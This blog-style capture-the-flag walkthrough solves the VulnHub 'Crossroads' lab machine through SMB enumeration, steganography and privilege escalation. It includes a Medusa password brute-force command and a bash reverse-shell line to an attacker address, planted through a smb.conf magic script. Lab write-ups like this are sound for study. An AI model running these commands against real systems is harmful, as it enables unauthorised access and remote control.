Yay! Here's another week to capture the flag. Today's vulnerable machine is the Crossroads from vulnhub (our most usual source). Let's dive into the action right away.
- We get the target machine's address using the netdiscover command.
- We can the ip address to find open ports which we can attack using nmap.
The scan shows that port 80/http, 139/smb and 445/smb are open. We also see a couple more things which maybe useful to us later.
- Let's navigate to the http port to see if we get anything useful. We actually did not find any useful information. We can proceed to do some directory busting to find available paths using dirbuster.
From the result, we get two interesting paths, /robots.txt and /note.txt. Now let's see if we can get some hints from these paths.
- Accessing the paths, the /robots.txt path didn't help us with any informaion, but the note.txt path gave some sort of clue.
For the clue, we will talk about it later.
- So far, we have found something really helpful. Since, we also have smb ports open, let's do some enumeration using enum4linux -
enum4linux -a 10.0.2.12
We found out that there's a user named albert in the server as well as the following shares - IPC$, smbshare and print$. Also, a guest account, nobody, was discovered.
Some other finding were uncovered.
- Now, let's try to access the smb server using the smbclient using the guest account, nobody.
We see that we are denied access to 2 of the shares asides the IPC$ one when using no password. The guest account does not have permissions to the smbshare and the print$ shares. So let's try albert's account.
Also, note that the guest account has anonymous access and is passwordless.
- Let's try connecting using albert account.
We see that we cannot login using albert's account as a password is required - NT_STATUS_LOGON_FAILURE and this is for all 3 shares. So, let's try brute forcing to get the password.
- Using hydra, it ran almost endlessly and I had to terminate it and use a much faster tool, Medusa using the command
medusa -h 10.0.2.12 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt
Viola, we now get the password to albert, bradley1.
- We now access the a particular share, smbshare, using the user as albert and password as bradley1.
We have accessed the smbshare now. So, let's look for interesting files. Nothing special was found. So, let's check other shares.
9.Accessing the print$ share, we found some files as shown in the image.
Unfortunately, these files found are just distractions. I spent a lot of time trying to get hints from them.
- After not getting anything from the files, I went to the smb.conf in the smbshare. With the help of some tools, I was able to find a configuration in the smb.conf file. In the configuration file, there's a magic script parameter. We are going to create a reverse shell to gain remote access to it.
We also see what permissions are available to the smbshare.
- We'll create a reverse shell script and name is smbscript.sh using the command
echo '#!/bin/bash' > smbscript.sh; echo 'bash -i >& /dev/tcp/10.0.2.4/5501 0>&1' >> smbscript.sh;on our attacking machine and enable all executable permissions with the commandchmod +x smbscript.sh.
The IP address 10.0.2.4 is the address of our attacking machine.
- As usual, we set up a netcat listener on our attacking machine
nc -nvlp 5501listening on port 5501 and wait for the shell. Next up, we upload the reverse shell script on the smb server which we had already established a connection using albert's credentials -put smbscript.sh.
We now have remove access to the target machine.
- Now, let's find how to escalate to root. Heading over to /home/albert diectory, we find a user.txt file, an interesting file(script) named beroot and an image, crossroads.png.
The user.txt file just tells us that we have found the first flag.
The beroot is an executable script and we execute it with ./beroot.
We are prompted to enter a password but we do not have any. Trying an empty password gave a wrong password response. Now, we going over to the image, steganography crosses our mind. We use the stegoveritas tool to extract data from the image with the command stegoveritas crossroads.png and wait for the results folder. (Before that, we used a python server to get the image to our attacking server to extract the data).
- After extraction, we noticed a results folder and inside the results folder was a keepers folder with the files as shown.
After printing the contents of each files, we discovered that only the first and the second to the last files were wordlists and have the same contents. Then we decided to try brute forcing the beroot script using one of the two lists as password lists.
- Using the bash script below, we ran it against the beroot script and found the password to be lemuel.
- Now, let's run the beroot script again and enter the password we got.
We now get a hint to find root creds using the ls command.
- Running the command, we see that there's a file name rootcreds and printing the content shows root's password.
Now, let's escalate to root.
Pheeeew, we are now root. That was a lengthy one and lots of research was done to successfully root it.
NOTE: Recall that the path /note.txt gave some hints, googling "three kings of blues" gives a very interesting result. The search result gives "B.B King, Albert King and Freddie King" and interestingly, "albert" happens to be the user that was exploited to escalate horizontally to root. That one big importance of reconnaissance (Although, we used enum4linux immediately we found smb ports open).
Also, do no be confused be contrasting target machine IP addresses (10.0.2.12 and 10.0.2.13) as I made changes and the addresses changed as well.
That's it. Until we meet again, feliz piratería.
Disclaimer: This solution is provided solely for educational and practical purposes. It is intended to demonstrate the techniques involved in solving cybersecurity challenges and to encourage ethical hacking practices. Any misuse of this information is strictly prohibited and may have legal consequences.